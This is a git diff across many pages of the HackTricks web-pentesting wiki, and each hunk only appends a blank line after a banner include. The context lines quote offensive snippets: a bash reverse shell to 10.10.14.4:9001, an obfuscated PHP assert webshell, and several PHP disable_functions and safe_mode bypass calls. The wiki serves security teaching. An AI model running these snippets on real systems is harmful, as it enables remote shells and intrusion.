a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -345,3 +345,4 @@ npm start {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md index e9f747099..89a666475 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md @@ -63,3 +63,4 @@ Exploit: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md index 17560fbb8..400cbfbcc 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md @@ -107,3 +107,4 @@ window.electronSend = (event, data) => { {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md index 9bd595ca2..3d124aba5 100644 --- a/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md +++ b/src/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md @@ -90,3 +90,4 @@ Specifically, the argument is replaced by changing the following two parts. {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/flask.md b/src/network-services-pentesting/pentesting-web/flask.md index b05b0961c..ab4f82e9f 100644 --- a/src/network-services-pentesting/pentesting-web/flask.md +++ b/src/network-services-pentesting/pentesting-web/flask.md @@ -102,3 +102,4 @@ Could allow to introduce something like "@attacker.com" in order to cause a **SS {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/git.md b/src/network-services-pentesting/pentesting-web/git.md index 9ace70c2c..7dc007fdb 100644 --- a/src/network-services-pentesting/pentesting-web/git.md +++ b/src/network-services-pentesting/pentesting-web/git.md @@ -23,3 +23,4 @@ Here you can find an study about github dorks: [https://securitytrails.com/blog/ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/golang.md b/src/network-services-pentesting/pentesting-web/golang.md index 57245a24b..26eb1eeda 100644 --- a/src/network-services-pentesting/pentesting-web/golang.md +++ b/src/network-services-pentesting/pentesting-web/golang.md @@ -21,3 +21,4 @@ curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/grafana.md b/src/network-services-pentesting/pentesting-web/grafana.md index 6e79f7914..7fe30b7bb 100644 --- a/src/network-services-pentesting/pentesting-web/grafana.md +++ b/src/network-services-pentesting/pentesting-web/grafana.md @@ -13,3 +13,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/graphql.md b/src/network-services-pentesting/pentesting-web/graphql.md index f2f292839..a92f1630e 100644 --- a/src/network-services-pentesting/pentesting-web/graphql.md +++ b/src/network-services-pentesting/pentesting-web/graphql.md @@ -641,3 +641,4 @@ curl -X POST -H "User-Agent: graphql-cop/1.13" -H "Content-Type: application/jso {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md b/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md index e9bef0f58..d17ed3224 100644 --- a/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md +++ b/src/network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md @@ -3,3 +3,4 @@ + diff --git a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md index 33f13c1b5..49641cb88 100644 --- a/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md +++ b/src/network-services-pentesting/pentesting-web/h2-java-sql-database.md @@ -38,3 +38,4 @@ In [**this post**](https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md index 58de60f8e..97c65e8c5 100644 --- a/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/src/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -276,3 +276,4 @@ HTTP/1.1 200 OK {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/imagemagick-security.md b/src/network-services-pentesting/pentesting-web/imagemagick-security.md index 649d88405..64de1705d 100644 --- a/src/network-services-pentesting/pentesting-web/imagemagick-security.md +++ b/src/network-services-pentesting/pentesting-web/imagemagick-security.md @@ -50,3 +50,4 @@ The effectiveness of a security policy can be confirmed using the `identify -lis {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/jboss.md b/src/network-services-pentesting/pentesting-web/jboss.md index d2558cbff..4e6b7a6f9 100644 --- a/src/network-services-pentesting/pentesting-web/jboss.md +++ b/src/network-services-pentesting/pentesting-web/jboss.md @@ -26,3 +26,4 @@ Google Dorking can aid in identifying vulnerable servers with a query like: `inu {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/jira.md b/src/network-services-pentesting/pentesting-web/jira.md index 0425cd63d..a50a9a45a 100644 --- a/src/network-services-pentesting/pentesting-web/jira.md +++ b/src/network-services-pentesting/pentesting-web/jira.md @@ -119,3 +119,4 @@ These are some of the actions a malicious plugin could perform: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/joomla.md b/src/network-services-pentesting/pentesting-web/joomla.md index adb006cf2..4918ec02c 100644 --- a/src/network-services-pentesting/pentesting-web/joomla.md +++ b/src/network-services-pentesting/pentesting-web/joomla.md @@ -124,3 +124,4 @@ If you managed to get **admin credentials** you can **RCE inside of it** by addi {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/jsp.md b/src/network-services-pentesting/pentesting-web/jsp.md index 0ded2a595..7fb904698 100644 --- a/src/network-services-pentesting/pentesting-web/jsp.md +++ b/src/network-services-pentesting/pentesting-web/jsp.md @@ -17,3 +17,4 @@ Accessing that web you may change all the links to request the information to _* {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index 7e950195a..c7e66f555 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -104,3 +104,4 @@ Read information about this here: [https://stitcher.io/blog/unsafe-sql-functions {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/moodle.md b/src/network-services-pentesting/pentesting-web/moodle.md index aa0855794..1f0b2c30b 100644 --- a/src/network-services-pentesting/pentesting-web/moodle.md +++ b/src/network-services-pentesting/pentesting-web/moodle.md @@ -110,3 +110,4 @@ find / -name "config.php" 2>/dev/null | grep "moodle/config.php" {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nextjs-1.md b/src/network-services-pentesting/pentesting-web/nextjs-1.md index f729d7332..0d3ed2a7d 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs-1.md +++ b/src/network-services-pentesting/pentesting-web/nextjs-1.md @@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md index 574eee387..4a878b05f 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs.md +++ b/src/network-services-pentesting/pentesting-web/nextjs.md @@ -1270,3 +1270,4 @@ const HeavyComponent = dynamic(() => import("../components/HeavyComponent"), { {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md index b32e17b86..f2f676995 100644 --- a/src/network-services-pentesting/pentesting-web/nginx.md +++ b/src/network-services-pentesting/pentesting-web/nginx.md @@ -299,3 +299,4 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/nodejs-express.md b/src/network-services-pentesting/pentesting-web/nodejs-express.md index e7d7f36cd..2fc6be4fa 100644 --- a/src/network-services-pentesting/pentesting-web/nodejs-express.md +++ b/src/network-services-pentesting/pentesting-web/nodejs-express.md @@ -38,3 +38,4 @@ cookie-monster -e -f new_cookie.json -k secret + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md index 39a152d38..598c4de8d 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/README.md @@ -508,3 +508,4 @@ $___($_[_]); // ASSERT($_POST[_]); {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md index 37d2cd3e4..278569b33 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md @@ -104,3 +104,4 @@ A method described in the [**original writeup**](https://swarm.ptsecurity.com/ex {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md index d65b3cf7d..2e7910796 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md @@ -70,3 +70,4 @@ $file = file_get_contents($url, false, $context); {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md index c7dc9e136..c00864e9c 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md @@ -821,3 +821,4 @@ get_meta_tags {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md index 7d2fccf75..e1f35255a 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.md @@ -87,3 +87,4 @@ This detailed walkthrough outlines the process of creating and deploying a PHP e {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md index b3d9886e8..4bf7a6ee0 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.md @@ -57,3 +57,4 @@ echo file_get_contents($data_file); {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md index 499f8fc66..ef4568d94 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md @@ -47,3 +47,4 @@ else {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md index 791dcfcf9..332701786 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md @@ -31,3 +31,4 @@ if(function_exists('pcntl_exec')) { {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md index 4afbdcadc..8139e085d 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2-fopen-exploit.md @@ -11,3 +11,4 @@ php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");' {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md index ddf4ab608..275a89fcb 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.3-win32std-ext-protections-bypass.md @@ -31,3 +31,4 @@ win_shell_execute("..\\..\\..\\..\\windows\\system32\\cmd.exe"); {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md index ea97213ab..a67293d7a 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.md @@ -19,3 +19,4 @@ var_dump(curl_exec(curl_init("file://safe_mode_bypass\x00".__FILE__))); {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md index 34bb66494..4f5b78c92 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.md @@ -230,3 +230,4 @@ function pwn($cmd) { {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md index 13342c073..479e876fa 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md @@ -434,3 +434,4 @@ You can also find an analysis of the vulnerability [**here**](https://medium.com {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md index 0e1f5ad6b..5de0479fa 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.md @@ -76,3 +76,4 @@ exit {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md index 730020b2a..d2d36c32d 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-perl-extension-safe_mode-bypass-exploit.md @@ -33,3 +33,4 @@ echo "
CMD: {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md index 508cb746c..c51679b30 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-safe_mode-bypass-via-proc_open-and-custom-environment-exploit.md @@ -19,3 +19,4 @@ while (!feof($a)) {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md index 9e49c9c0a..5c0d4445f 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md @@ -134,3 +134,4 @@ echo "[-] Write failed. Exiting\n"; {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md index 13a2dd8df..e8a256123 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.md @@ -43,3 +43,4 @@ echo $MyBoot_ioncube; {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md index bf87f3f08..1652c1080 100644 --- a/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md +++ b/src/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.md @@ -32,3 +32,4 @@ echo shellshock($_REQUEST["cmd"]); {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/prestashop.md b/src/network-services-pentesting/pentesting-web/prestashop.md index 4fa8b20da..24d0e1df1 100644 --- a/src/network-services-pentesting/pentesting-web/prestashop.md +++ b/src/network-services-pentesting/pentesting-web/prestashop.md @@ -10,3 +10,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/put-method-webdav.md b/src/network-services-pentesting/pentesting-web/put-method-webdav.md index 8c744cbf3..122249ee4 100644 --- a/src/network-services-pentesting/pentesting-web/put-method-webdav.md +++ b/src/network-services-pentesting/pentesting-web/put-method-webdav.md @@ -99,3 +99,4 @@ wget --user --ask-password http://domain/path/to/webdav/ -O - -q {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/python.md b/src/network-services-pentesting/pentesting-web/python.md index 4e2c56211..42da06f2d 100644 --- a/src/network-services-pentesting/pentesting-web/python.md +++ b/src/network-services-pentesting/pentesting-web/python.md @@ -27,3 +27,4 @@ test a possible **code execution**, using the function _str()_: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/rocket-chat.md b/src/network-services-pentesting/pentesting-web/rocket-chat.md index 5056c2856..fccd6b33b 100644 --- a/src/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/src/network-services-pentesting/pentesting-web/rocket-chat.md @@ -39,3 +39,4 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'") {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/special-http-headers.md b/src/network-services-pentesting/pentesting-web/special-http-headers.md index 6dda47b0c..9c1006364 100644 --- a/src/network-services-pentesting/pentesting-web/special-http-headers.md +++ b/src/network-services-pentesting/pentesting-web/special-http-headers.md @@ -202,3 +202,4 @@ Strict-Transport-Security: max-age=3153600 {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/spring-actuators.md b/src/network-services-pentesting/pentesting-web/spring-actuators.md index 38c2a8798..8d1fdd8c2 100644 --- a/src/network-services-pentesting/pentesting-web/spring-actuators.md +++ b/src/network-services-pentesting/pentesting-web/spring-actuators.md @@ -66,3 +66,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/symphony.md b/src/network-services-pentesting/pentesting-web/symphony.md index 81f72d555..0debebc08 100644 --- a/src/network-services-pentesting/pentesting-web/symphony.md +++ b/src/network-services-pentesting/pentesting-web/symphony.md @@ -11,3 +11,4 @@ Take a look to the following posts: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/tomcat/README.md b/src/network-services-pentesting/pentesting-web/tomcat/README.md index d50fdce6e..1259ddfea 100644 --- a/src/network-services-pentesting/pentesting-web/tomcat/README.md +++ b/src/network-services-pentesting/pentesting-web/tomcat/README.md @@ -266,3 +266,4 @@ Example: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md index 7d1157b65..996f5d6d8 100644 --- a/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md +++ b/src/network-services-pentesting/pentesting-web/uncovering-cloudflare.md @@ -143,3 +143,4 @@ Find more info about how to do this in the [original article](https://scrapeops. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md index ce0b6a875..2cbf52384 100644 --- a/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md +++ b/src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md @@ -21,3 +21,4 @@ If you find valid credentials, you can use more metasploit scanner modules to ob {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md index 8a2948b7a..7f613e839 100644 --- a/src/network-services-pentesting/pentesting-web/web-api-pentesting.md +++ b/src/network-services-pentesting/pentesting-web/web-api-pentesting.md @@ -57,3 +57,4 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0 {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md index e1a3d8605..d4e3d0800 100644 --- a/src/network-services-pentesting/pentesting-web/werkzeug.md +++ b/src/network-services-pentesting/pentesting-web/werkzeug.md @@ -175,3 +175,4 @@ This is because, In Werkzeug it's possible to send some **Unicode** characters a {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md index 0260ce95a..180de8d19 100644 --- a/src/network-services-pentesting/pentesting-web/wordpress.md +++ b/src/network-services-pentesting/pentesting-web/wordpress.md @@ -437,3 +437,4 @@ Also, **only install trustable WordPress plugins and themes**. {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/2fa-bypass.md b/src/pentesting-web/2fa-bypass.md index 24bd00412..a00bcde8d 100644 --- a/src/pentesting-web/2fa-bypass.md +++ b/src/pentesting-web/2fa-bypass.md @@ -131,3 +131,4 @@ P {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/abusing-hop-by-hop-headers.md b/src/pentesting-web/abusing-hop-by-hop-headers.md index a2df520bf..cae0fce90 100644 --- a/src/pentesting-web/abusing-hop-by-hop-headers.md +++ b/src/pentesting-web/abusing-hop-by-hop-headers.md @@ -42,3 +42,4 @@ If a cache server incorrectly caches content based on hop-by-hop headers, an att {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/account-takeover.md b/src/pentesting-web/account-takeover.md index 521e3b649..fe48525c6 100644 --- a/src/pentesting-web/account-takeover.md +++ b/src/pentesting-web/account-takeover.md @@ -124,3 +124,4 @@ With the new login, although different cookies might be generated the old ones b {{#include ../banners/hacktricks-training.md}} + diff --git a/src/pentesting-web/bypass-payment-process.md b/src/pentesting-web/bypass-payment-process.md index 0825cccf8..024105736 100644 --- 